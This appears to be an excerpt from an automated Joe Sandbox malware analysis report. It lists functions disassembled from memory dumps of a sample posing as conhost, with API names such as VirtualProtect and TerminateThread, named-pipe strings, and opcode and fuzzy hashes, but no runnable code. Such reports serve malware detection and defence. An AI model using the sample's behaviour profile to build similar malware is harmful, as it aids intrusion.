                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 3cf5cd065baa51dc294c0af7c50038e2d24eecab6348b46ba06c506fecf5aecb
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 1801F732748B4086EB249F12A89C39962B1E788BC0F488035AE9D43754DE3DC58A87A0
                                            Function 000001780DD23E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 2421ddee415731474270875073706ed6a430f79051b0acd1a90591e13ffc909c
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: FA01F77629974083FB649F61F88D79962B0BB55B55F040028ED4D06369EF3EC0CC8720
                                            Function 000001780DD21AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: e1144f31b779c1e80a3980e8bae3ae6bd941b7f90a09afa88a60586a0c06b12c
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: DAF03C7235868593FB209F25F98D3AD6371F755B88F848021AE4D46958DE6DC6CCCB20
                                            Function 000001780DD23708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: e4a645601ee8a40c4b2ed9ecc485f7d1f8af6aa8d0bffd4d3f2b40523c1fbab4
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 9BF05E75358B8083FB089F13B91D1AD6270AB48FC0F448430FE0E07B18CE6CC48A8710
                                            Function 000001780DD2B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: 73083313445ad5674ac18d834bf7bcdb6309d50f907b6b749eb20f18f152c7e0
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: F3F0367229960193FB149F24E89E7AD5370EB45760F540619EE6D455E8CF6DC4CCC720
                                            Function 000001780DD25810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 53103a6efa6a0ff85ac755304797652f8be063312ac02d8d363490723a5f3a04
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 1D02843225DA84C6E7A08F55F4987AEB7B0F394794F104115FA8E87BA9DF7CC4988B10
                                            Function 000001780DD22C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: ddf59b3441dd9a51c3f691dcf75aef4b7db70749df115e5b876e051f2ce4d281
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 20517A3628864187E3648F16A84CAAEB7B0F798B94F504119BE4E43B54DF38C989CB64
                                            Function 000001780DD22AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 2ac2ca769ee5b7752db3c08ea56729a6f959fd7b6078d8b88a07bae0da175bcd
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 3D516736298641CBE764CF16AC4C6AEB7B0F398B84F404119BE5E43758DF38D989CB14
                                            Function 000001780DD25E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: b14cd715d42fb436c41e5172b0b50e2c83aa7799a272e5b85b0a660580f2ee90
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: B561903616DA84C7E7A08F55E4987AEB7B0F398B44F100116FA8D47BA9DF7CC5888B14
                                            Function 000001780DD23EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: d02ccd982c4ef5979f9c38faa37d0721a172aeabc933e221ccd8a892cd85393c
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 1411EC3668974093EB249F25F48C29E67B0FB55B84F04052AEE4D037A8EF7DC9988794
                                            Function 000001780DD28CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 07166595e4c1e858b37c1c57b21cb710e293663cd74dc149cdd34be397f6d29d
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 98518B32259600CBEB58CF55E44CBBC77A1E764BA8F148221AE5E47788DF7DC889D720
                                            Function 000001780D3E9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: b93284e9f7b1d5b75055131f1cd0c5b0724b75427bc635a216b971634e6af38f
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: CE518E322882808AEB748F1195483DCB7B0F756B99F164115FA9D47BD5EF38C8D9CB21
                                            Function 000001780DD2A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: e420dd19768ae284d7c3d7d281fa988a5dc262ea8df6c416d43db718e660b033
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: BA614632508BC4C6EB218F15A4487EEB7A0F7A5B98F445215EE9C13B99DF7CC198CB10
                                            Function 000001780DD2AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 1324ffd4c3337e8da79d86f868b37b9dc0b6ecebfd8530a88c27304c607158c0
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 67516B36288780CBEB648F22994C3AC77B1E364B94F146116EE9D47B95CF3CD498DB21
                                            Function 000001780DD23950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: c232bd33d8254cf60c40ed959016021e1a22b3e8b40d0b088701ad7560957444
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 3B112E3135878193FB209F25E84D3EE62B4B764780F944529BE4D93694EF6CC98DC720
                                            Function 000001780DD31FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 4f81ef619d09e9481e398967235c90fa56670a8e97d6aeca70d6eebc0fb70930
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: F3D1EE33B58A808AF710CFA5D8496EC3BB5F355B98F404216EE5D97B99DE34C18AC350
                                            Function 000001780DD214A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 713d25b490befd771a6ed3f540ed0d53a100f7ca0a1dd238ee6945e2d2b68ac8
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: D4011332658B90DAE714DF66A80D29D77B1F789F80B098025EF8D53728DE38D496C750
                                            Function 000001780DD328F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001780DD328DF), ref: 000001780DD32A12
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: f464809c5d1689886b5e05c9abd477f4bdde29406286f8bf892a04c11a93c852
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 2D91C033A586949BFB608F65985E3ED2FB0B354B88F544106EE4E57A89DE34C4CDC328
                                            Function 000001780DD28090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 9d107553ca4ad33a36a80339b766f4089f56eeb5a372d24b6fb30d36041dbcbd
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: B5111536794F048AEB40CF60E8593AC33B4F719758F440E21EE6D867A8DF78C1988350
                                            Function 000001780DD227E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
